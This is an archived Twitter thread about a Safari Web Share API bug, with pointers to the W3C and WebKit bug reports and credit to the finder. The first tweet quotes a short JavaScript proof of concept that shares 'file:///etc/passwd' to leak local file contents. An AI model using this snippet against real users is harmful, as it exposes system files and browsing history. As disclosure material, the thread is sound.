tomayac’s avatartomayac’s Twitter Archive—№ 15,696

      1. Wow, this Web Share API bug ⤵️ is concerning. const pwn = () => { navigator.share({ text: 'Check out this cute kitten!', url: 'file:///etc/passwd', }); }; Turns out Safari actually shares the _contents_ of /etc/passwords, and allows for stealing the history, too. x.com/firt/status/1298338366065451008
        Permalink On twitter.com Twitter logo tomayac’s avatar ♻️ 109 Retweets ❤️ 227 Favorites Mood +7 🙂
    1. …in reply to @tomayac
      For anyone following along, this is now tracked as github.com/w3c/web-share/issues/173 in the Web Share API repo. As a public trace, I've filed @webkit bug bugs.webkit.org/show_bug.cgi?id=215842, since Apple's internal Radar—which doubtlessly exists judging from blog.redteam.pl/2020/08/stealing-local-files-using-safari-web.html#content:~:text=Disclosure%20timeline—isn't public.
      Permalink On twitter.com Twitter logo tomayac’s avatar ♻️ 2 Retweets ❤️ 9 Favorites Mood +1 🙂
  1. …in reply to @tomayac
    Hopefully needless to say: Full credits to @h0wlu.
    On twitter.com Twitter logo tomayac’s avatar ❤️ 1 Favorite Mood +2 🙂